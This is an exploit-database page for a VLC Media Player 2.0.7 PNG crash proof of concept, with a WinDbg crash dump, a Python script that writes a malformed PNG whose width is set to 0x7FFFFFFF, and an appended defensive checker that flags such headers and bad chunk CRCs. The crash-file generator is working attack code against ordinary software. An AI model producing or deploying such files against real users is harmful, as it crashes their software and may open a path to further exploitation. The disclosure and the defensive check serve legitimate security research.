VLC Media Player 2.0.7 PNG Crash PoC - exploit.company
vendor: VLC Media Player
by: Kevin Fujimoto
N/A
CVSS
N/A
Crash
Unknown
CWE
Product Name: VLC Media Player
Affected Version From: 2.0.7
Affected Version To: 2.0.7
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 64-bit
Unknown

VLC Media Player 2.0.7 PNG Crash PoC

This is a proof-of-concept exploit that crashes the VLC Media Player version 2.0.7 when processing PNG files.

Mitigation:

Unknown
Source

Exploit-DB raw data:

#!/usr/bin/python

# VLC Media Player 2.0.7 PNG Crash PoC
# Vendor Homepage: http://www.videolan.org/
# Version: 2.0.7
# Tested on: Windows 7 64-bit
# Author: Kevin Fujimoto

# Debug Information:
# Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
# Copyright (c) Microsoft Corporation. All rights reserved.

# *** wait with pending attach
# Symbol search path is: SRV*g:\symbols*http://msdl.microsoft.com/download/symbols
# Executable search path is: 
# ModLoad: 00400000 00425000   G:\Program Files (x86)\VideoLAN\VLC\vlc.exe
# ModLoad: 775b0000 77730000   C:\Windows\SysWOW64\ntdll.dll
# ModLoad: 750f0000 75200000   C:\Windows\syswow64\kernel32.dll
# ModLoad: 76100000 76147000   C:\Windows\syswow64\KERNELBASE.dll
# ModLoad: 623e0000 6240c000   G:\Program Files (x86)\VideoLAN\VLC\libvlc.dll
# ModLoad: 50420000 5066d000   G:\Program Files (x86)\VideoLAN\VLC\libvlccore.dll
# ModLoad: 75ab0000 75b50000   C:\Windows\syswow64\ADVAPI32.dll
# ModLoad: 76170000 7621c000   C:\Windows\syswow64\msvcrt.dll
# ModLoad: 76150000 76169000   C:\Windows\SysWOW64\sechost.dll
# ModLoad: 75210000 75300000   C:\Windows\syswow64\RPCRT4.dll
# ModLoad: 75000000 75060000   C:\Windows\syswow64\SspiCli.dll
# ModLoad: 74ff0000 74ffc000   C:\Windows\syswow64\CRYPTBASE.dll
# ModLoad: 76390000 76fda000   C:\Windows\syswow64\SHELL32.DLL
# ModLoad: 76230000 76287000   C:\Windows\syswow64\SHLWAPI.dll
# ModLoad: 75dd0000 75e60000   C:\Windows\syswow64\GDI32.dll
# ModLoad: 75ca0000 75da0000   C:\Windows\syswow64\USER32.dll
# ModLoad: 760f0000 760fa000   C:\Windows\syswow64\LPK.dll
# ModLoad: 75bf0000 75c8d000   C:\Windows\syswow64\USP10.dll
# ModLoad: 71880000 718b2000   C:\Windows\system32\WINMM.DLL
# ModLoad: 75590000 755c5000   C:\Windows\syswow64\WS2_32.dll
# ModLoad: 75300000 75306000   C:\Windows\syswow64\NSI.dll
# ModLoad: 75730000 75735000   C:\Windows\syswow64\PSAPI.DLL
# ModLoad: 75750000 75908000   C:\Windows\syswow64\WININET.DLL
# ModLoad: 75be0000 75be4000   C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
# ModLoad: 77580000 77585000   C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
# ModLoad: 76220000 76224000   C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
# ModLoad: 75c90000 75c94000   C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
# ModLoad: 74df0000 74df9000   C:\Windows\system32\version.DLL
# ModLoad: 75a40000 75a43000   C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
# ModLoad: 75740000 75743000   C:\Windows\syswow64\normaliz.DLL
# ModLoad: 75310000 75508000   C:\Windows\syswow64\iertutil.dll
# ModLoad: 75a50000 75ab0000   C:\Windows\system32\IMM32.DLL
# ModLoad: 762c0000 7638c000   C:\Windows\syswow64\MSCTF.dll
# ModLoad: 10000000 10059000   C:\Windows\SysWOW64\guard32.dll
# ModLoad: 74de0000 74de7000   C:\Windows\system32\fltlib.dll
# ModLoad: 755d0000 7572c000   C:\Windows\syswow64\ole32.dll
# ModLoad: 73d90000 73d9b000   C:\Windows\system32\profapi.dll
# ModLoad: 720f0000 72170000   C:\Windows\system32\uxtheme.dll
# ModLoad: 73cb0000 73cc3000   C:\Windows\system32\dwmapi.dll
# ModLoad: 71f50000 720ee000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
# ModLoad: 75060000 750e3000   C:\Windows\syswow64\CLBCatQ.DLL
# ModLoad: 75b50000 75bdf000   C:\Windows\syswow64\OLEAUT32.dll
# ModLoad: 61070000 610bc000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
# ModLoad: 5bf20000 5bf3c000   G:\Program Files (x86)\VideoLAN\VLC\plugins\audio_output\libaout_directx_plugin.dll
# ModLoad: 5bf00000 5bf1d000   G:\Program Files (x86)\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
# ModLoad: 5b850000 5b874000   G:\Program Files (x86)\VideoLAN\VLC\plugins\video_output\libdirectx_plugin.dll
# ModLoad: 5b830000 5b849000   G:\Program Files (x86)\VideoLAN\VLC\plugins\mmxext\libmemcpymmxext_plugin.dll
# ModLoad: 5b7f0000 5b82f000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
# ModLoad: 59020000 59048000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
# ModLoad: 57fb0000 58001000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
# ModLoad: 5b7d0000 5b7eb000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll
# ModLoad: 5b760000 5b77b000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
# ModLoad: 50830000 508ac000   G:\Program Files (x86)\VideoLAN\VLC\plugins\stream_filter\libstream_filter_httplive_plugin.dll
# ModLoad: 50370000 50420000   G:\Program Files (x86)\VideoLAN\VLC\plugins\stream_filter\libstream_filter_dash_plugin.dll
# ModLoad: 59060000 5907a000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll
# ModLoad: 58040000 58065000   G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libzip_plugin.dll
# ModLoad: 58020000 58039000   G:\Program Files (x86)\VideoLAN\VLC\plugins\stream_filter\libstream_filter_record_plugin.dll
# ModLoad: 57bb0000 57bda000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
# ModLoad: 50210000 5036f000   G:\Program Files (x86)\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
# ModLoad: 57b50000 57baa000   G:\Program Files (x86)\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
# ModLoad: 500c0000 50202000   G:\Program Files (x86)\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
# ModLoad: 57cd0000 57ced000   G:\Program Files (x86)\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
# ModLoad: 57970000 57989000   G:\Program Files (x86)\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll
# ModLoad: 68cf0000 697d9000   G:\Program Files (x86)\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll
# ModLoad: 75510000 7558b000   C:\Windows\syswow64\COMDLG32.DLL
# ModLoad: 72230000 72281000   C:\Windows\system32\WINSPOOL.DRV
# ModLoad: 72330000 72337000   C:\Windows\system32\WSOCK32.DLL
# ModLoad: 73da0000 73db7000   C:\Windows\system32\userenv.dll
# ModLoad: 72200000 72216000   C:\Windows\system32\CRYPTSP.dll
# ModLoad: 72180000 721bb000   C:\Windows\system32\rsaenh.dll
# ModLoad: 73a60000 73a6e000   C:\Windows\system32\RpcRtRemote.dll
# ModLoad: 507d0000 50828000   G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libupnp_plugin.dll
# ModLoad: 72650000 7266c000   C:\Windows\system32\IPHLPAPI.DLL
# ModLoad: 72640000 72647000   C:\Windows\system32\WINNSI.DLL
# ModLoad: 57940000 57965000   G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll
# ModLoad: 57160000 5717a000   G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libpodcast_plugin.dll
# ModLoad: 56d90000 56daa000   G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libmediadirs_plugin.dll
# ModLoad: 507b0000 507c9000   G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libwindrive_plugin.dll
# ModLoad: 62da0000 62f0f000   C:\Windows\system32\explorerframe.dll
# ModLoad: 62d70000 62d9f000   C:\Windows\system32\DUser.dll
# ModLoad: 62cb0000 62d62000   C:\Windows\system32\DUI70.dll
# ModLoad: 730c0000 73144000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
# ModLoad: 77c00000 77c40000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
# ModLoad: 77bd0000 77bf5000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
# ModLoad: 77ba0000 77bc2000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
# ModLoad: 77b80000 77b9b000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll
# ModLoad: 50790000 507ab000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libes_plugin.dll
# ModLoad: 69830000 69857000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll
# ModLoad: 61c90000 61cab000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll
# ModLoad: 6bbb0000 6bbca000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libtta_plugin.dll
# ModLoad: 675f0000 6760b000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libwav_plugin.dll
# ModLoad: 6aaf0000 6abdb000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsid_plugin.dll
# ModLoad: 69d90000 69eb8000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll
# ModLoad: 6ccd0000 6cd86000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\liblive555_plugin.dll
# ModLoad: 6ef10000 6ef3b000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libogg_plugin.dll
# ModLoad: 70950000 70969000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdirac_plugin.dll
# ModLoad: 644f0000 6450a000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll
# ModLoad: 64370000 6438a000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll
# ModLoad: 6c2c0000 6c2da000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libpva_plugin.dll
# ModLoad: 6a510000 6a53f000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libts_plugin.dll
# ModLoad: 67f30000 67f4a000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libnsv_plugin.dll
# ModLoad: 6f980000 6f999000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libau_plugin.dll
# ModLoad: 6a6e0000 6a74f000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libgme_plugin.dll
# ModLoad: 6c5e0000 6c5fa000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll
# ModLoad: 64810000 64829000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libxa_plugin.dll
# ModLoad: 071a0000 072ad000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmod_plugin.dll
# ModLoad: 66c10000 66c2a000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll
# ModLoad: 060b0000 060cb000   G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libimage_plugin.dll
# ModLoad: 77b40000 77b7e000   G:\Program Files (x86)\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
# (1e8c.1954): Access violation - code c0000005 (!!! second chance !!!)
# eax=072b0048 ebx=00ab0000 ecx=00000000 edx=00000000 esi=072b0040 edi=00ab0000
# eip=775eb6d8 esp=0658daf4 ebp=0658dbc4 iopl=0         nv up ei pl nz na po nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
# ntdll!RtlpAllocateHeap+0x7fb:
# 775eb6d8 8b09            mov     ecx,dword ptr [ecx]  ds:002b:00000000=????????
# 0:009> !exploitable -v
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Module load completed but symbols could not be loaded for G:\Program Files (x86)\VideoLAN\VLC\vlc.exe
# Exception Faulting Address: 0x0
# Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Read Access Violation

# Faulting Instruction:775eb6d8 mov ecx,dword ptr [ecx]

# Basic Block:
#     775eb6d8 mov ecx,dword ptr [ecx]
#        Tainted Input Operands: ecx
#     775eb6da mov edx,dword ptr [edx+4]
#     775eb6dd cmp ecx,edx
#        Tainted Input Operands: ecx
#     775eb6df jne ntdll!rtlpallocateheap+0x8e4 (7763af86)
#        Tainted Input Operands: ZeroFlag

# Exception Hash (Major/Minor): 0x65193219.0x71557302

# Stack Trace:
# ntdll!RtlpAllocateHeap+0x7fb
# ntdll!RtlAllocateHeap+0x23a
# msvcrt!_calloc_impl+0x136
# msvcrt!_calloc_crt+0x16
# msvcrt!_getbuf+0x11
# msvcrt!_flsbuf+0x94
# msvcrt!_fputwc_nolock+0xd5
# msvcrt!fputwc+0x51
# vlc+0x5975
# vlc+0x97ee
# vlc+0x700b
# msvcrt!_wsopen_s+0x1b
# msvcrt!_unlock+0x15
# msvcrt!_iob+0x60
# ntdll!ExecuteHandler2+0x26
# Instruction Address: 0x00000000775eb6d8

# Description: Data from Faulting Address controls Branch Selection
# Short Description: TaintedDataControlsBranchSelection
# Exploitability Classification: UNKNOWN
# Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at ntdll!RtlpAllocateHeap+0x00000000000007fb called from msvcrt!_calloc_impl+0x0000000000000136 (Hash=0x65193219.0x71557302)

# The data from the faulting address is later used to determine whether or not a branch is taken.

out = (
    b"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A"  # PNG signature
    b"\x00\x00\x00\x0D"  # IHDR size
    b"\x49\x48\x44\x52"  # IHDR chunk type
    b"\x7F\xFF\xFF\xFF"  # width (0x7FFFFFFF, the largest value the PNG spec allows)
    b"\x00\x00\x01\x02"  # height
    b"\x01"  # bit depth
    b"\x03"  # color type (indexed)
    b"\x00"  # compression method
    b"\x00"  # filter method
    b"\x00"  # interlace method
    b"\xBA\x1B\xD8\x84"  # IHDR chunk CRC
    b"\x00\x00\x00\x03"  # PLTE size
    b"\x50\x4C\x54\x45"  # PLTE chunk type
    b"\xFF"  # red
    b"\xFF"  # green
    b"\xFF"  # blue
    b"\xA7\xC4\x1B\xC8"  # PLTE chunk CRC
    b"\x00\x00\x00\x01"  # tRNS size
    b"\x74\x52\x4E\x53"  # tRNS chunk type
    b"\x00"  # alpha
    b"\x40\xE6\xD8\x66"  # tRNS chunk CRC
    b"\x00\x00\x00\x01"  # IDAT size
    b"\x49\x44\x41\x54"  # IDAT chunk type
    b"\xFF"  # image data
    b"\x05\x3A\x92\x65"  # IDAT chunk CRC
    b"\x00\x00\x00\x00"  # IEND size
    b"\x49\x45\x4E\x44"  # IEND chunk type
    b"\xAE\x42\x60\x82"  # IEND chunk CRC
)

print("Writing file...")

# Bytes literals and print() keep the script valid under both Python 2 and 3;
# the with-block closes the file even if the write fails.
with open('crash.png', 'wb') as f:
    f.write(out)

print("File written!")
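A defensive check over the same structure the PoC builds, added here as an example rather than code from the original exploit: it walks the chunks, verifies every CRC and flags an IHDR whose dimensions blow past a pixel budget, which is exactly what the 0x7FFFFFFF width above does. MAX_PIXELS and the two sample PNG byte strings are constructed for this example.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Assumed limit (chosen for this example): cap the pixel count so that a
# width * height * bytes-per-pixel product cannot wrap a 32-bit size.
MAX_PIXELS = 1 << 28


def iter_chunks(data):
    """Yield (type, payload, crc_ok) for every chunk in a PNG byte string."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG: bad signature")
    pos = 8
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(payload) != length or len(crc) != 4:
            raise ValueError("truncated %r chunk" % ctype)
        crc_ok = (zlib.crc32(ctype + payload) & 0xFFFFFFFF) == struct.unpack(">I", crc)[0]
        yield ctype, payload, crc_ok
        pos += 12 + length


def check_png(data):
    """Return a list of findings; an empty list means the header looks sane."""
    chunks = list(iter_chunks(data))
    if not chunks or chunks[0][0] != b"IHDR" or len(chunks[0][1]) != 13:
        return ["first chunk is not a 13-byte IHDR"]
    width, height = struct.unpack(">II", chunks[0][1][:8])
    findings = []
    # The PNG spec caps each dimension at 2**31 - 1; the PoC's width sits exactly there.
    if not (0 < width <= 0x7FFFFFFF and 0 < height <= 0x7FFFFFFF):
        findings.append("IHDR dimensions out of spec: %dx%d" % (width, height))
    if width * height > MAX_PIXELS:
        findings.append("IHDR dimensions exceed pixel budget: %dx%d" % (width, height))
    for ctype, _payload, crc_ok in chunks:
        if not crc_ok:
            findings.append("CRC mismatch on %s chunk" % ctype.decode("ascii", "replace"))
    return findings


def chunk(ctype, payload):
    """Build one chunk with a correct CRC (used only to construct the samples below)."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


# Constructed samples: one mirrors the PoC's IHDR (width 0x7FFFFFFF, height 0x102), the other is a sane 1x1 header.
HUGE_IHDR = PNG_SIG + chunk(b"IHDR", struct.pack(">IIBBBBB", 0x7FFFFFFF, 0x102, 1, 3, 0, 0, 0)) + chunk(b"IEND", b"")
SANE = PNG_SIG + chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)) + chunk(b"IEND", b"")
```

Run `check_png(open("crash.png", "rb").read())` against the file the PoC writes to see the pixel-budget finding before the image ever reaches a decoder.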